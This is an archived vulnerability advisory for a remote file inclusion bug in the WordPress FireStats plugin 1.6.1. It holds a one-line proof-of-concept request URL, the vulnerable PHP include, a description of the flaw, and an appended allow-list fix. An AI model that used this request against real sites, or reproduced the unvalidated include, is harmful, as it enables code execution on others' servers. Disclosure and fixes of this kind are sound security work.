WordPress FireStats 1.6.1 Remote File Inclusion

Posted Jun 14, 2009
Authored by darkmasking

The WordPress FireStats plugin versions 1.6.1 and below suffer from a remote file inclusion vulnerability.

tags | exploit, remote, code execution, file inclusion
SHA-256 | 5023bfef7b22c65f3d557e4e4e0c48b5770cdec9ab8363ec202cd1b05778bfcc

=====================================================================================================================
WordPress Plugin FireStats <= 1.6.1-stable (fs_javascript) RFI Vulnerability
=====================================================================================================================
Author         : darkmasking
Date           : June 13th, 2009
Contact        : darkmasking[at]gmail.com
Critical Level : Dangerous *red*
---------------------------------------------------------------------------------------------------------------------
Affected software description :
Software : FireStats Version 1.6.1-stable [FireStats is a web statistics system]
Vendor   : http://firestats.cc/
Price    : $25.00 ( commercial usage )
=====================================================================================================================

[~] RFI :

http://www.TARGET.com/[path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de]

---------------------------------------------------------------------------------------------------------------------

[~] Vuln : firestats-wordpress.php : Line 36

    $path = fs_get_firestats_path();
    $file = $_GET['fs_javascript'];
    unset($_GET['fs_javascript']);
    if (strpos($file,"..") !== false) die(".. is not allowed in fs_javascript");
    require_once("$path/$file");

---------------------------------------------------------------------------------------------------------------------

[~] Vulnerability description :

This script is vulnerable to file inclusion attacks.

The script includes a file whose name is determined by user-supplied data (the fs_javascript GET parameter).
That data is not properly validated before being passed to the include function: the only check is for the
".." substring, and anything else the value contains is passed straight through to require_once().

---------------------------------------------------------------------------------------------------------------------

[~] How to fix this vulnerability :

Edit the source code to ensure that input is properly validated. Where possible,
it is recommended to make a list of accepted filenames and restrict the input to that list.

For PHP, the option allow_url_fopen would normally allow a programmer to open,
include or otherwise use a remote file using a URL rather than a local file path.
It is recommended to disable this option in php.ini.

---------------------------------------------------------------------------------------------------------------------

[~] Greetz :

Sorry bro, I don't have any friends yet, so this one is just for myself!

=====================================================================================================================
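The allow-list fix recommended above, written out as an added example (this is not FireStats' own code). It assumes fs_get_firestats_path() returns the plugin directory as in the vulnerable snippet, and the two JavaScript filenames in the allow-list are hypothetical placeholders for whatever the plugin actually ships.

```php
<?php
// Added example, not the plugin's code: hardened replacement for the
// fs_javascript include. fs_get_firestats_path() is the plugin's own
// function from the vulnerable snippet; the allow-list names are hypothetical.

function fs_resolve_javascript(string $path, ?string $requested): ?string
{
    // 1. Allow-list: only files we ship may be included. A strict in_array()
    //    rejects URLs, absolute paths, traversal and anything else outright,
    //    which is stronger than the original ".." substring check.
    $allowed = ['js/firestats.js', 'js/firestats-wp.js']; // hypothetical names
    if ($requested === null || !in_array($requested, $allowed, true)) {
        return null;
    }

    // 2. Defence in depth: resolve both sides on disk and confirm the result
    //    still lives inside the plugin directory, so a symlink or a mis-set
    //    $path cannot make an allow-listed name point somewhere else.
    $base = realpath($path);
    $full = realpath($path . '/' . $requested);
    if ($base === false || $full === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

$path = fs_get_firestats_path();
$file = fs_resolve_javascript($path, $_GET['fs_javascript'] ?? null);
unset($_GET['fs_javascript']);
if ($file === null) {
    http_response_code(400);
    die('invalid fs_javascript');
}
require_once $file;
```

Disabling allow_url_fopen / allow_url_include in php.ini, as the advisory suggests, is still worth doing on the server, but the allow-list is the fix that removes the bug from the code itself.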

